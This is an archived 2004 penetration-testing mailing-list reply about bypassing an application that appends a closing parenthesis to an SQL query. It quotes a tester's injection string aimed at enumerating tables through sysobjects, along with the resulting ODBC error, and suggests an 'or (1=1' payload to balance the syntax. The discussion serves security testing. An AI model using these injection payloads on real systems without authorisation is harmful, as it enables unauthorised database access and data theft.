Re: SQL-Injection escape ')'

From: Fabrice MARIE (fabrice.marie_at_fma-rms.com)
Date: 07/05/04

  • Next message: Tyler Durden: "Re: hacking challenges"
    To: pen-test@securityfocus.com
    Date: Mon, 5 Jul 2004 13:11:09 +0800
    
    

    Hello,

    On 03 July 2004 pm 22:45, Strcpy wrote:
    > Hi list.
    > I'm working on a web-application for vulnerability
    > assessments in order to complete a pen-test job.
    > there is a vulnerable query there but I can't escape
    > it and use it to go farther.
    > the page script adds a ')' to the end of the query string
    > always.
    > I tried to pass it by using # or -- or ')'=')' at the
    > end of my query strings, but none worked :/
    > here is an example :
    > i sent this :
    > A') select name from sysobjects where xtype='U'--
    > [Microsoft][ODBC Microsoft Access Driver] Syntax
    > error. in query expression 'city_name='Tehran' and
    > (agency_english ='A') select name from sysobjects
    > where xtype='U'--')'
    > would you mind please help me ?

    try something like this:
    select name from sysobjects where xtype='U' or (1=1

    This way if the application adds a parenthesis, it's just going
    to close the one you opened on purpose and the syntax should
    remain correct in the end.

    'or 1=1' doesn't affect your SELECT query, because it's always true.

    Have a nice day,

    Fabrice.

    --
    Fabrice A. MARIE
    FMA Risk Management Solutions
    http://www.fma-rms.com/
    
